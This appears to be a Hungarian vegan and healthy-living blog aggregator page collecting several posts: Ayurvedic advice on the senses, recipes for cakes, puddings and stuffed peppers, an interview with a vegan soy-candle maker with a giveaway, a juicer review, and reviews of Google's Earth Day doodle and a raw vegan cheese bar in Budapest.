nem csak ízletessé, élvezetessé teszik az ételeket, de segítik az emésztést, támogatják a testet a salakanyagok eltávolításában, tisztítják a vért, kedvezően hatnak a légzőrendszerre, keringésre, szív és érrendszerre - használd őket bátran. Érdemes megismerned a fűszerek, gyógynövények hatásait, egészségmegőrző szerepüket az étkezésben Próbáld ájurvédikus alkatodnak megfelelő ízeket előnyben részesíteni. A különböző ízek felélénkítik a tested és boldogsággal töltik el a lelked. A mesterséges ízek, ízfokozók, az ízesítés túlzásba vitele (túl csípős, túl édes, túl, túl...) kedvezőtlenül hatnak a tudatodra és a testi egészségedre is. Az ízek és túlzásba vitelük hatásairól, alkalmazásukról részletesen egy korábbi bejegyzésben itt olvashatsz. Szaglás A szaglásod is hatással van a testedre, lelkedre és a tudatodra. A kellemes illatok, pozitív lenyomatokat képeznek benned - akárcsak gondolj vissza a gyermekkori sütemény illatra vagy egy csokor levendula illatára vagy egy általad kedvelt személy illatára. Ezzel szemben ha kellemetlen szagokat tapasztalsz az rossz érzéseket okoz. A kellemetlen szag taszító, undorító, émelygést okozó. Kerüld a mesterséges illatanyagokat - wc illatosítók, nem természetes illatgyertyák, nem tiszta minőségű parfümök, dezodorok, öblítők. Részesítsd előnyben a természetes, friss, finom kellemes illatokat. Vedd körül magad olyan illatokkal, amely ájurvédikus alkatodnak megfelelő és elősegíti a tested öngyógyító folyamatinak beindítását. Az aromaterápia ma már szerencsére nyugaton is egyre elterjedtebb:) Figyelj arra, hogy nappal lehet cél az élénkítés, de estére mindig olyan illatokat válassz, melyek nyugtató hatásúak, mert így segítik az elalvást. Tápláld a szaglásod minél több természetes, friss illattal. A természetben lélegezz nagyokat a hegytetőn, szagolgasd a virágokat, fákat, gyümölcsöket. Ezek a finom illatok nem csak pozitív érzéki tapasztalatot eredményeznek , de energiával is feltöltenek. feltöltenek. Légy tudatos az érzékeid állapotáról, töltsd fel magad sok pozitív tapasztalattal és életenergiával. Sok pozitív tapasztalatot, tiszta érzékszerveket, boldog, harmónikus tudatállapotot kívánok:) szeretettel: Kati
Epres citromos tórúkocka
Könnyű frissítő finomság, ami mosolyt hoz az arcodra és ellátja a szervezeted a szükséges tápanyagokkal....Kitaláljátok mi az? Elárulom, hogy mire gondoltam; a kedvenct tórúkockámra hozzávalók - 2cukkini - 4 tojás - 70 gr +60 gr édesítő - 200gr zabliszt - vanilia - 175gr joghurt - 500gr túró - 100gr eper - 150gr joghurt - 1 citrom leve - fél zacskó sütőpor Így készítsd - A piskótához verj fel 2egész tojást és két fehérjét - Add hozzá a joghurtot, citromlevet és az édesítőt, majd verd habosra - Reszeld le a cukkinit, majd add a tojásos keverékhez - A lisztet keverd össze vaniliával és sütőporral, majd öntsd a masszáhot - Oszt ketté a masszát és süsd két tepsiben 180 fokon 35percig - Amíg sül készítsd el a túrúkrémet: keverd össze a 2 tojássárgáját a túrót, joghurtot, édesítőt és a citromlevet, majd kockázz bele epret
Vegán életmód – Greenway Design + Nyereményjáték
2017. május 16. Zizi kalandjai
Amikor először belefutottam Ildi munkájába, akkor realizálódott bennem, hogy lakberendezni is lehet vegánul, vagyis életmódot teremteni is lehet vegánul. Ő ugyanis azon felül, hogy dekoratőr és blogger, még környezettudatos is, egyfajta “zöld” szemüvegen keresztül figyeli a világot. Mindezek mellett 100% eco szójaviaszból készít gyertyákat, amelyek kizárólag természetes alapanyagok felhasználásával készülnek, nem tartalmaznak mérgező paraffint és más kőolajszármazékot, szennyeződést és 100%-os tisztaságú illóolajaival illatosítja őket.
Szóval fogjátok a kezetekbe a reggeli turmixotokat, kávétokat, teátokat, dőljetek hátra és olvassátok el Ildivel készített interjúmat. Megosztja velünk saját történetét, ő hogyan lett vegán és hogyan lett a lakberendezés szerelmese. Nyereményjáték pedig az interjú után!
Csapó Ildikóval beszélgettem az alkotásról, a vegánságról, a gyertyáiról...
Bemutatnád magad röviden, ki vagy, mivel foglalkozol?
Csapó Ildi vagyok, dekoratőr, blogger. 2014-ben döntöttem úgy, hogy a jelenlegi főállásom mellett belevágok egy kreatív szakmába és végre megvalósítom, amiről évek óta álmodoztam. Elkezdtem a dekoratőr iskolát, majd folytattam a lakberendező szakkal. Nagyjából ezzel egyidőben kezdtem el rendszeresen bejegyzéseket írni a Greenway blogba, melynek hivatalos indulása 2015-ben volt, de előtte már évek óta próbáltam írni; néha ki is került egy-egy bejegyzés, de sohasem lett folytatás.
A Greenway Design az elmúlt két és fél évben rengeteg változáson ment keresztül, miközben én is sokat fejlődtem és ma már tisztán látom, hogy az életmódom nagy hatással van arra is, ahogyan a blogot vezetem. A mottóm a “Tudatos dekor, tudatos tér” tulajdonképpen öszefoglalja azt a természetközeli és következetes látásmódot, amit az olvasóimnak szeretnék sugallni az írásaimmal és a képeimmel. Imádom az újrahasznosítást és az apró DIY megoldásokat, valamint a balkonkertészkedést. A Greenway blog egy olyan otthon kialakítsához nyújt inspirációkat, melyben végtelen lehetőségek vannak az újragondolásra, a kreatív megújulásra.
Hogyan kezdődött nálad a vegánság (először étrend váltással, aztán az élet más területére is bevezetted)? A családod is így étkezik?
Életem két fő mozgatórugója a kreatívitás és a “zöld” szemlélet. Ez a két dolog olvad össze és bontakozik ki a Greenway Design blogjában is, ezek az az én kis belső motorjaim.
Gyermekkorom óta mániákusan szeretem az állatokat. Viccesen hangzik, de kislányként – a játék babakocsiban nekem nem baba volt, hanem kiskacsa, kispulyka, kiscsibe. Természetesen mindnek neve volt és húgommal órákon át játszottunk velük. Amikor megnőttek, akkor is gondjukat viseltük. Iskolából hazatérve, minden nap szenteltünk nekik egy kis időt, hogy megszeretgessük őket. Voltak viszont a ház körül olyan állatok is, akiknek nem adhattunk nevet, mert már születésükkor mondták szüleink, hogy nem élhetnek sokáig. Egy apró békés megyei faluban nőttem fel, ahol a 80-as és 90-es évek fordulóján nem sok pénzkereseti lehetőség volt és a mezőgazdaság mellett az állattartás jelentett bevételt a családok számára. Ennek megfelelően szüleim is rengeteg “haszon”állatot tartottak, akiket vágóhidakra adtunk el. Tudtam és láttam Édesanyámon és Édesapámon is, hogy nehezen válnak meg az állatoktól, de nem volt más választásuk. Úgy éreztem, hogy elnyomják magukban mindazt, amit én is, hogy szeretem és sajnálom őket és nem akarom, hogy meghaljanak. De ekkor még csak gyanítottam, hogy, ami az elszállítás után történik velük, az nagyon nem etikus.
Érettségi után Budapestre költöztem és szüleim sem tartottak már annyi állatot, ezért nem foglalkoztatott a dolog. Aztán 2005-ben került újra felszínre ez az egész, amikor megnéztem az akkori nagy kedvenc, az Antimaniax nevű osztrák zenekar I can’t smell my freedom című dalának videóját és ott minden eldőlt. Megláttam, hogy mi történik a színfalak mögött és eldöntöttem, hogy a kegyetlenséghez nem akarok többé hozzájárulni és hogy az állatok iránt érzett szeretetem sokkal erősebb az étkezési szokásaimnál. (A videó teljes valóságában mutatja be a nagyüzemi állattartás minden velejáróját és a vágóhidak rideg borzalmait, valamint az állatkísérleteket és a bőr-, szőrmeipar áldozatait.)
Fokozatosan hagytam abba a húsevést, annak mindenféle állomását megjárva. 2006 tavaszán már egyáltalán nem ettem, utána pedig fokozatosan ismerkedtem meg az állatkísérletek nélkül készült kozmetikumokkal is, majd végül 2013-ban a növényi életmód mellett döntöttem, melynek köszönhetően először a tejtermékekre mondtam nemet, majd a tojásra is. Mindez azóta teljesen kihat az öltözködésemre és minden használati tárgyamra. Megnéztem a Making the Connection és az Earthlings filmeket, amik mind megerősítettek abban, hogy ez az én utam.
Mindez azért fontos számomra, mert úgy érzem, hogy az állatok nem tudják magukat megvédeni és nem tudják tudtunkra adni a félelmeiket, a fájdalmukat. Megpróbálom őket képviselni és megmutatni, hogy a növényi életmód is lehet teljes. Az ember néha (sőt talán sokszor) csak felnőttként kap válaszokat bizonyos dolgokra. A vegán életmód egy nagyon hosszú folyamat eredménye az életemben, ezért soha nem várom el másoktól, hogy azonnal változzanak. Férjem néha eszik még húst, de látom rajta is a változást. Érzem, hogy már tudja Ő is, mennyi szenvedéssel jár a polcról leemelt virsli. Tejterméket már nem igazán fogyaszt, tojást is nagyon ritkán. Itthon egyáltalán nem főzünk állati eredetű ételeket.
Miért gyertyákkal kezdtél foglalkozni, honnan jött az ötlet?
A dekoratőr iskolában jöttem rá, hogy az állati eredetű dolgok nem csak az ételekben, a kozmetikumokban és az öltözködés terén jelennek meg az ember életében, hanem a dekorációk és a mindennapi használati tárgyak is sok ilyet tartalmaznak. Gondoljunk csak egy méhviasz gyertyára vagy egy helyes kis bőr fogantyúra a fiókon vagy egy kosáron, vagy ott vannak a kis szőrme kulcstartók, melyekről ma már tudom, hogy honnan származnak és hogyan készülnek.
Rádöbbentem, hogy az állati eredetű termékek még a dekor szakmámat is képesek érinteni, ezért kutatni kezdtem a témában. A PETA ajánlását elolvasva jöttem rá, hogy tényleg valós a dolog, viszont tudok rajta változtatni. 2016-ban jött az illatgyertyák ötlete, amikor a boltban kapható paraffin alapú gyertyák helyett vegyszermentes megoldást kerestem, de mindenhol csak a méhviaszt ajánlották. Külföldi oldalakon kutakodva leltem az ECO szójabab viaszából készült gyertyákra és nagyon megtetszettek. Láttam, hogy máshol már évek óta nagy sikere van az így készült gyertyáknak, így hát belevágtam, először csak kiváncsiságból.
Hogyan tanultad meg (mennyit kellett tanulni, volt-e valamilyen képzés, amit elvégeztél) a vegán gyertya készítést?
Fórumokat böngészve kísérletezgettem itthon hónapokon keresztül, legtöbbször későn este. A hétközben kiöntött gyertyákat hétvégén tesztelgettem; figyeltem hogyan és mennyi ideig égnek, mennyi illatanyagra van szükség, hogyan viselkedik a viasz. Tulajdonképpen sok türelem és kitartás kellett, mint a legtöbb dologhoz az életben.
Hány féle gyertyát készítesz jelenleg?
Jelenleg háromféle illat vásárolható meg, de különböző csomagolást is kínálok hozzá. Lehet kapni ezüst színű tégelyben, kétféle kupakkal, de öntök gyertyát már üvegbe is.
Tervezel termékbővítést? Ha igen, mi lesz a következő terméked?
Igen, rengeteg tervem van. Tulajdonképpen egy óriási ötlet “vihar” dúl a fejemben szokás szerint, aminek még le kell tisztulnia. Nyáron mindenképpen megvásárolhatóak lesznek a jelenlegi illatok, de tervezek egy igazán frissítően citrusosat is, ami szuper társunk lesz a meleg kiülős estéken. Persze nagyon készülök az őszre is, hogy mire úrrá lesz rajtunk a “bekuckózós” hangulat, finom illatokkal tudjak előállni.
Ildi blogja, a Greenwaydesign
– weboldal
– Facebook
– Instagram
Ildi gyertyái megvásárolhatok a weboldalán vagy emailen keresztül, valamint 2017. május 21-én a Kiskert Piacon és júniusban már a Vegan Sunday Marketen is találkozhatnak vele az érdeklődők.
*****
NYEREMÉNYJÁTÉK!!!
Nyeremény : Két darab gyertya (egy nyertesnek) – 1 db Fresh Start és 1 db Floral Fanatic (a legújabb virágmintás kupakkal). Írjátok meg ide a bejegyzés alá kommentben, hogy ti milyen illatban szeretnétek ilyen vegán gyertyát (melyik a kedvenc illatotok)!
Szabályok : A kommentelésen felül plusz pontokért lájkolhatjátok a Greenway Design Facebook és Instagram oldalát (írjátok meg ezt is a kommentben, ha megtettétek). 2017. május 19-ig lehet játszani. Sorsolás a random.org-gal. Eredményhirdetés 2017. május 20-án. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a nyertesnek Ildi postázza magyarországi címre.
Kókuszos grízpuding vaníliával
2017. május 14. Élj harmóniában
A férjem nagyon szereti a tejbegrízt, ezt onnan tudom, hogy nagy mennyiségben és rendszeresen fogyasztja.:) Ma amikor megkérdeztem mit szeretne vacsorára enni, mondta, hogy tejbegrízt. Gondoltam szuper... vasárnap este, honnan veszek nem homogenizált, nem ultra pasztörizált, bio tejet... majd formálódni kezdett bennem egy új recept. Itthon van bio kókusztej konzerves változatban, gondoltam miért ne lehetne kókusztejjel tejbegrízt készíteni. Van kókuszcukor is, így stílusosan édesítésre ezt használtam. Kókuszos grízpuding vaníliával Hozzávalók 2 személyre 1 doboz (400ml) kókusztej 6 ek. búzadara (gluténmentes változatban hajdinagríz) 1 ek, kókuszcukor csipet vanília Vegyszermentes (bio) alapanyagokat használj! A kókusztejet tedd egy edénybe a tűzre, tedd bele a kókuszcukrot és a vaníliát, majd forrald fel. Amikor felforrt tedd hozzá apránként a grízt és keverd csomómentesre. 5 percig keverd folyamatosan, addigra a gríz megfő. Ha a folyósabb állagot kedveled akkor elég 5 ek gríz, ha azt szereted, hogy sűrűbben szereted, akár 7 ek. grízt is tehetsz bele. A tetejét kókuszreszelékkel díszítheted.
fahéjas zabsüti
Egy tápláló egyszerű finomságra vágysz, ami amellett, hogy nagyon finom, egészséges is? Jó helyen keresgélsz! Ez a süti garantáltan a legjobb társ a reggeli kávé mellé. Hozzávalók - 3répa - 2alma - 450gr túró - 1 tojás - 300gr zabpehelyliszt - 20gr édesítőszer - fahéj - sütőpor Így készítsd - Reszeld le a megtisztított répát és almát - Add hozzá a túrót és a tojást - Egy másik tálba keverd össze a száraz hozzávalókat - Add hozzá a répás keveréket, majd alaposan keverd össze - Öntsd a masszát sütőpapírral bélelt tepsibe - Süsd előmelegített sütőben 180fokon 45percig
A negyedik születésnapi torta (nyers, laktózmentes, gluténmentes, vegán)
2017. május 10. Zizi kalandjai
El sem hiszem, hogy a nagyobbik kisfiam, Ádi már négy éves lett! Tisztán emlékszem a születésének minden pillanatára, az első fogának kibújására, az első önálló lépéseire, amikor tíz hónapos kora körül elkezdődött az übercukiság időszaka, ami azóta is tart, csak most már kiegészül gondolkodással, értelemmel. Két gyerek anyukájaként látom most már, hogy minden gyerek más és más, nagyon különbözőek a testvérek is. Ádi is teljesen más gyerek, mint Ákos. Persze huncutságban, zsiványságban nincs akadály egyikőjüknél sem! Nagyon nehéz két zsivánnyal a mindennapokat “túlélni”, de ilyenkor Éva barátnőm szavai csengenek a fülemben: “Ezeket az éveket senki nem adja vissza nekünk! Töltsünk velük olyan sok időt, amennyit csak tudunk!”
Ádi már magyarázó kiskrapek hihetetlenül jó humorral. Folyamatosan kérdez, nem győzünk a kérdéseire válaszolni és persze olyan kérdésekkel is bombáz, amire nem tudjuk a választ (gyorsan utánanézünk a neten, hogy képbe kerüljünk az adott témával kapcsolatban )! Nehéz vele lépést tartani, de igyekszünk. Imád kuktáskodni a konyhában, ezért is kapott egy ilyen szettet a ajándékba.
A szülinapját megint csak a biopiacon ünnepeltük szűk családi és baráti körben, ahogyan tavaly is. Annyira szuper a helyszín, minden adott a piknikezéshez, rohangáláshoz, játszóterezéshez és finom ételekhez. Hasonló dolgokat készítettem, mint tavaly, olyanokat, amelyeket könnyű enni két rohangálás között gyerekeknek és felnőtteknek is.
A tortát együtt választottuk ki Ádival. Az alaprecept a The Happy Pears srácoktól származik, kicsit módosítottam rajta. Az alapja magos-datolyás-vaníliás, középen van egy isteni karamell réteg, a tetején pedig egy egyszerű kókuszkrém. Igen, krém, bár többen az Instagram fotó alapján kókusztejszínhabnak gondoltátok. Nagyon-nagyon tömény torta, elég belőle egy vékony szelet. Nagy kapcsos formában készült, így bőven jutott mindenkinek.
Nyers vegán karamell-kókuszkrém torta Mentés Nyomtatás Előkészítési idő 15 perc Főzési idő 1 óra Teljes idő 1 óra 15 perc Könnyen elkészíthető nyers vegán karamell-kókuszkrém torta. Tömény, de nagyon finom! Szerző: Zizi Recept típusa: sütemény, torta, nyers Konyha: vegán, gluténmentes Adag/mennyiség: 8-10 főre Hozzávalók Torta alaphoz: 100 g dió 100 g kesudió 105 g friss datolya, kimagozva 2 evőkanál extra szűz kókuszzsír 1 evőkanál kókuszreszelék ¼ teáskanál őrölt vanília Karamell krémhez: 375 g friss datolya, kimagozva 180 g mandulavaj 9 evőkanál víz 4 evőkanál extra szűz kókuszzsír ½ teáskanál őrölt vanília késhegynyi só Kókusz krémhez: 2 konzerv kókusztej (jó minőségű, 60% kókusz tartalmú), használat előtt hűtőbe téve 2-4 órára 2 evőkanál agavészirup ¼ teáskanál őrölt vanília Tálaláshoz: friss eper Elkészítés Tegyük a diót és a kesudiót a robotgépbe és aprítsuk szemcsésre. Ekkor adjuk hozzá a datolyát, a szobahőmérsékletű kókuszzsírt, kókuszreszeléket, és vaníliát. Dolgoztassuk a gépet addig, amíg a torta alapunk összeáll tésztává. A tortaformát béleljük ki folpackkal vagy kenjük ki kókuszolajjal és nyomkodjuk az aljába a datolyás diós-kesudiós keveréket, majd tegyük a hűtőbe megkeményedni, amíg elkészítjük a többi réteget. Mossuk el a robotgép tartályát. Tegyük a mandulavajat, a datolyát, a szobahőmérsékletű kókuszzsírt, a vaníliát és a sót a robotgépbe. Kezdjük el dolgoztatni a gépet és lassan adagoljuk hozzá a vizet. Akkor van kész, ha karamell ízű és nyúlós az állaga, mint a karamellnek. Kenjük ezt a krémet (kicsit nehézkes a nyúlós állaga miatt) a datolyás diós-kesudiós alapra és tegyük vissza a hűtőbe. Vegyük ki a kókusztejet a hűtőből és bontsuk ki. A hideg hatására kettévált a sűrű krémes rész a vizestől. Kanalazzuk ki a krémet mindkét konzervből egy tálkába. A vizes részt tegyük hűtőbe és használjuk fel turmixok készítéséhez. Adjuk a krémhez az agavészirupot és a vaníliát, majd jól keverjük el és kanalazzuk a torta tetejére. Tálalásig tartsuk hűtőben (legalább 2 órát)! Tálaljuk friss eperrel! Jegyzetek 23 cm-es kapcsos tortaformában készült. Feltétlen jó minőségű minél magasabb zsírtartalmú konzerv kókusztejet használjunk ehhez a recepthez. Aszalt datolya is jó a tortához (ha nem kapunk frisset), csak érdemes használat előtt egy fél órára langyos vízbe beáztatni, hogy könnyebben aprítsa a robotgép) Édesítésre agavészirupot használtam, hogy megmaradjon a krém fehér színe, de természetesen használhatunk juharszirupot, vagy datolyaszirupot is. Ebben az esetben a krém drapp, világosbarna színű lesz. 3.5.3226
Zöldséges quinoával töltött sült paprika
Nagyon szeretem a quinoa-t. Édesen, sósan, zöldségekkel vagy gyümölcsökkel és olajos magvakkal. Igyekszem gyakran enni. Itt, Angliában könnyebben és olcsóbban lehet hozzájutni, mint otthon. Inkább a natúr hajdina az, amit leginkább csak lengyel üzletekben vehetsz, quinoa viszont majdnem minden üzlet polcán ott van. Az inka kultúrában a gabonák anyjaként (mégha nem is gabona igazából, hanem libatopfélékhez tartozó növény magja ) tekintettek rá és szinte istenként tisztelték. Tavasszal kezdték meg vetését, és mivel erős tiszteletnek örvendett, így maga a császár egy aranyhegyű lapáttal kezdte meg a vetését minden évben.
Amellett hogy gluténmentes, kalóriaszegény és segíti a lúgosítási folyamatot, ahogy már korábbi írásaimban is jeleztem, mind a 9 alapvető fontosságú aminosavat tartalmazza. Következő receptem remek fogyókúrázók számára is, vagy ha csak valami különlegeset ennél/főznél, de gyorsan, töltsd meg a paprikákat quinoával és némi párolt zöldséggel vagy kukoricával. A sült fehérrépa remekül passzol hozzá, igaz, az elkészítése kicsit tovább tarthat, mint a sült töltött paprikának. Egy biztos, különlegesen finom ízvilágban lesz részed, ha elkészíted eme étket. :)
A recept
Hozzávalók:
- néhány fej kaliforniai paprika (jelen esetben 10-12 közepes méretű)
- 1 bögre quinoa
- 1 bögre mirellit zöldborsó
- 1 bögre kukorica (más zöldségekkel is elkészíthetjük)
- 1 bögre póréhagyma-karika
- vegán sajt / sörélesztő pehely / füstölt tofu
Elkészítés:
A paprikákat megmossuk, szárukat, magházukat kivágjuk. A paprikákat félbe is vághatjuk, de egészben is meghagyhatjuk a töltéshez, száránál kivágva megtölthetjük. A zöldborsót és kukoricát (ha nem konzerv) enyhén megsózva megpároljuk. A quinoa-t enyhén sós vízben puhára főzzük. Főzés előtt áztatjuk kb. 5-10 percet és alaposan átmossuk. Főzésnél a víz ellepje, de nem kell kétszeres mennyiségű víz. A zöldségeket (kukorica, borsó, póréhagyma) összekeverjük a megfőtt quinoa-val, ételízesítővel picit megszórjuk, adhatunk hozzá 1 kanál sörélesztő pelyhet, majd a paprikákat megtöltjük. Vegán sajtot reszelhetünk a tetejére, ha az nincs, akkor füstölt tofu szeleteket is tehetünk a paprikákra vagy sörélesztő pehellyel megszórjuk a töltelék tetejét. Kb. 20 perc alatt megsütjük őket.
Mi sült fehér-répával ettük. A fehér répákat megmossuk, meghámozzuk és enyhén sós vízben pár percig előfőzzük. Ezt követően sütőpapíros tepsibe fektetjük és fokhagymás olajjal enyhén megkenjük. Addig sütjük, míg barnulni kezdenek. Nagyon finom magában is a töltött paprika és a sült fehérrépa is, de együtt végképp fenséges.
Omlós kókuszos keksz
Sok maradt a brokkoli, így gondoltam csinálok valami édeset is. Elég bizarúl hangzik, de az eredmény meglepően finom lett. Hozzávalók - 150gr brokkoli - 100gr kókuszliszt - 65gr zabliszt - 3 tojás - 50ml kókusztej - 4ek édesítő - 50gr joghurt Így készítsd - A brokkolit szedd rózsáira, majd pépesítsd - Add hozzá a nedves hozzávalókat - Egy külön tálba keverd össze a hozzávalókat - Majd dolgozd össze a két keveréket - Formázz kis kekszeket, majd tedd sütőpapírral bélelt tepsibe - Süsd 180 fokon 30 percig
Sana EUJ808 lényerőgép tesztelése
2017. április 27. Gitta nyersétel blogja
Juice-oljatok! Hű de milyen fura ezt leírni... magyarul készítsetek juice-okat, vagyis szűrt leveket! A turmix összekutyulja a zöldségeket, gyümölcsöket, benne hagyva a rostokat, ami nagyon jó, az is kell! De sokkal több tápanyagot tudunk felszívni a szűrt levekből, és sokkal többet tudunk belőlük meginni, épp a rostok nélküliségük miatt. Léböjt idején csak szűrt leveket iszunk. A hétköznapokban pedig reggelire zöld turmix, délután pedig uzsira egy nagy pohár zöldséglé! (hihetetlen, de próbáljátok ki, jól lehet lakni 5-6 dl szűrt lével) Milyen lényerő gépet vegyünk? Nehéz ezt eldönteni, mert mindegyik gépnek megvan az előnye és persze a hátránya is, és attól függ, hogy ki melyikkel tud megbarátkozni. Nekem a felültöltős lényerő gépek kedvesebbek, és nálam az is szempont, hogy nagy legyen a betöltő nyílás (ne kelljen apróra felvágni a zöldségeket) Két gépet már teszteltem, itt vannak az erről szóló bejegyzések: Kuvings b6000 lényerő gép tesztelése Sana EUJ707 lényerő gép tesztelése Nos, most ez is SANA, de míg a 707 típus vízszintes kiépítésű volt, ez most függőleges, vagyis felül van a betöltő nyílása, és nagy a betöltő nyílása :), ahogy a Kuvings gép is felültöltős, azt is nagyon szerettem használni. Nagyon tetszik, hogy külön kidobja a száraz anyagot, nem a gépen belül tárolja, hogy csak szétszedés útján lehessen kivarázsolni. jobbra megy a lé, balra a száraz rost anyagTöbbféle italt készítettem vele, nálunk majdnem minden nap van alma cékla répa , ez a kedvenc. Nem gyors, de ezt nem is hirdeti magáról, szépen komótosan összeroppantja a zöldségeket, és szinte teljesen száraz a pép, amit maga után hagy. (ellentétben a gyümölcscentrifugával) Szuper-mega-lájk a kifolyó csövön lévő elzárónak, ami lehetővé teszi, hogy csak akkor follyon ki a lé, amikor azt én akarom, és ha nincs alatta a kancsója, akkor ne csöpögjön össze-vissza. Nagyon szépen látszik a képen, hogy az ital még 15 perc után sem válik szét, vékony réteg hab van ugyan a tetején, de csak ennyi. Gyümölcslé készítése: nem csak a kemény zöldségekkel, de a puhább gyümölcsökkel is elbír, én ananászt is préseltem vele, és bírta, meg se kottyant neki. (bár a gyártó azt írja, hogy az érett gyümölcsöket kevésbé szereti) A szétszedése kicsit nehézkes, ebbe bele kell jönni. Elég sok alkatrészből áll, amit egyenként a csap alá kell tartani. De az elmondható, hogy ez így van mindegyik gyümölcspréssel. Amit viszont külön kiemelnék, hogy mosogató-barát. Vagyis szenzációs gyorsan és könnyen lehet végezni a mosogatással. Valahogy olyan anyagból készült, amiről egy szempillantás alatt lejön a cucc.. Összefoglalnám: Előnye: nagy betöltő nyílás, erős motor, kifolyó elzáró kupak, hab nélküli lé, gyors mosogatás, hatékony működés, szinte teljesen száraz a visszamaradó zöldségpép Hátránya: lassú (de ez egyben az előnye is, mert így kíméletesen nyeri ki a levet a zöldségekből, csak ki kell várni), és kicsit bonyolult a szétszerelés, összerakás (ezt viszont meg lehet tanulni, és be lehet gyakorolni) Nézzétek meg működés közben : Összességében egy jó kis masina, ajánlom mindenkinek szeretettel.
Barackos-diós túrós táska
2017. április 26. Beautilicious
Imádom a túrós süteményeket minden mennyiségben és minden formában. Egyszerűen nem lehet őket megunni, hisz rengeteg féle képp lehet őket variálni. Most egy barackos diós ízvilágot választottam, ami nagyon-nagyon bejött az egész családnak. Hozzávalók - 300gr répa - 300gr zabliszt - 50gr útifű maghéj - 300ml víz - 1tojás - fél zacskó sütőpor - 35gr szénhidrátcsökkentett liszt - 50gr édesítő - 500gr túró - 65gr baracklekvár - 30gr édesítő - 65gr dió Így készítsd - Az útifű maghéjat áztasd be a vízbe - A megtisztított répát pürésítsd, majd add hozzá az útifű maghéjjat és a többi nedves hozzávalót - Keverd hozzá a többi hozzávalót - A krémhez nincs más dolgod, mint a hozzávalókat alaposan összekeverni - Nyújtsd ki a tésztát, majd vágj belőle négyzeteket - A közepét töltsd meg krémmel, majd hajtsd be a négy sarkát és rögzítsd fogvájóval - előmelegített sütőben süsd 180fokon 30percig
A Föld napja és a Google tipplei
2017. április 22. Vegán lettem
Ma van a Föld napja, a Google pedig ismét népszerűsíti a növényi étrendet, ezúttal aranyos illusztrációk segítségével. Arról már korábban is volt szó, hogy a Google támogatja a veganizmust. Legalább is egyet ért abban, hogy a legtöbb, amit Földünkért tehetünk, az a növényi étrendre való áttérés. Ma, a Föld napján a vállalat újra bebizonyította, hogy kiáll a zöld jövő mellett. A 2017-es Föld napja alkalmából a Google egy 12 részes Google Doodle-t készített, ,,Tippek a Föld napjára címmel. A rövid vetítésben arra is utalnak, hogy a növényi étrend környezetbarátabb, mint azok az étrendek, melyekben szerepel a hús. Mi az a Google Doodle? Biztos Te is észrevetted már, hogy ünnepnapokkor vagy jeles események alkalmából megváltozik a Google logó a Google főoldalán. Ezeket az ideiglenes logókat, animációkat, rövid videókat vagy diavetítéseket hívják Google Doodle-nak. Tippek a Föld napjára - A nyitóképen egy alternatív Google logót láthatunk, melyben az egyik O betű maga a Föld. - A második képen egy rókát láthatunk, aki éppen a Földről álmodik. - Láthatjuk, hogy ez az álom inkább rémálom. Óceánjaink haldokolnak. - A klímaváltozás hatásai pedig jobban érzékelhetőek, mint valaha. - Ébresztő! Elég volt ebből a rémálomból. - Most már tényleg itt az ideje, hogy tegyünk valamit. - Ültessünk fákat. - Válasszuk inkább a növényi eredetű élelmiszereket, mert környezetbarátabbak. - Amikor megyünk valahova, inkább biciklizzünk, sétáljunk, használjunk tömegközlekedést vagy üljünk többen egy autóba. - Használjunk megújuló energiaforrásokat. - Kapcsoljuk le a lámpákat, ha elhagyunk egy helyiséget. Áramtalanítsunk. Ne használjuk feleslegesen a légkondicionálót. - Együtt mindenre képesek vagyunk. Ha a “További Információ” gombra kattintasz, akkor átirányít a “Tippek a Föld napjára” találati oldalra. Itt kapsz egy rövid, animációs összefoglalót a Föld napi “teendőkről”. Itt már ténylegesen leírják, hogy a növényi élelmiszerek fogyasztása környezetbarát választás. Jó látni, hogy a “megszokott” tanácsokon kívül helyet kapott a veganizmus is a Google tippjei között. Mindenki tudja, hogy feleslegesen áramot fogyasztani, minden nap autót használni, szemetelni és vizet folyatni nem éppen környezetbarát cselekedetek. Azt azonban már kevesebben tudják, hogy a húsfogyasztás is káros a környezetre. Szerencsére egyre gyakrabban találkozhatunk ezzel az információval, a Google-nek pedig jár a pacsi, hogy elismerték az ügy fontosságát. Ne feledd, a növényi étrend által csökkenthetjük igazán az ökológiai lábnyomunkat. Cselekedj úgy, mintha minden nap a Föld napja lenne, legyél te is vegán.
Say Cheez Raw - Gourmet növényi ,,sajt különlegességek Budapesten
2017. április 20. Vegán lettem
Versenybe szállhat egy érlelt nyers vegán ,,sajt a hagyományossal? Megtalálhatod a választ Say Cheez Raw bárban. A Say Cheeze Raw növényi ,,sajt különlegességeket készítő kézműves bár nyitását türelmetlenül várták a sajtalternatívára éhes tömegek. A Móricz Zsigmond körtértől csupán pár perc sétára levő Szabolcska Mihály utca 7-es szám alatt várja a sajtimádókat a kifejezetten gourmet jellegű kis ,,sajt bár. Bár a helyiség nem túl nagy, de annál családiasabb a hangulata, és falatozás közben a tulajdonosokkal is jóízűen el lehet beszélgetni. A Say Cheez Raw kínálata A Say Cheeze Raw egy nyers vegán ,,sajt bár, mely szigorúan csak a legjobb alapanyagokból készült nyers, növényi alapú, kézműves sajt-alternatívákat kínálja a vegánoknak, a növényi étrend iránt érdeklődőknek, vagy éppen azoknak, akik szeretnék elhagyni a tejtermékeket étrendjükből. A sajtalternatívákat fogyaszthatod önmagában, vagy nyers krékerrel. Mindkettő külön-külön, és együtt is isteni. A ,,sajt készítésben szerencsére nem merült ki a tulajdonosok kreativitása, ugyanis egyéb ,,élő ételeket és italokat is kóstolhatsz a Say Cheeze Raw-ban, például nyers vegán taco-t, különböző smoothiekat vagy nyers édességeket. Látogatásom alatt egy sajtalternatívákból álló sajttálat kóstoltam, datolyás, levendulás, spirulinás és zsályás fokhagymás ízesítésű ,,sajtokból összeválogatva, melyeket két féle krékerrel fogyasztottam. Ezen kívül egy lágy ,,sajtot, nyers vegán taco-t, smoothiet és nyers fahéjas csigát ettem. A Say Cheeze Raw-ban kapható sajtalternatívák az érleléstől különlegesek. Pont úgy, ahogyan egy hagyományos sajtot, ezeket a kézműves növényi ,,sajtokat is érlelik. Minden falat egy kézzel készült, egészséges, élő ízbomba, amit egyszerűen nem tudsz majd nem szeretni. Nagyon sajtszerű és hihetetlenül krémes, gazdag íze van a Say Cheeze Raw sajtalternatíváknak, teljes mértékben visszaadták azt a sajtos ízvilágot, amit vártam. Semmire sem tudnék rosszat mondani, a krékerek, a taco és a smoothie is ízesek voltak, szinte el sem hittem, hogy ami ennyire egészséges, az lehet ennyire finom is. 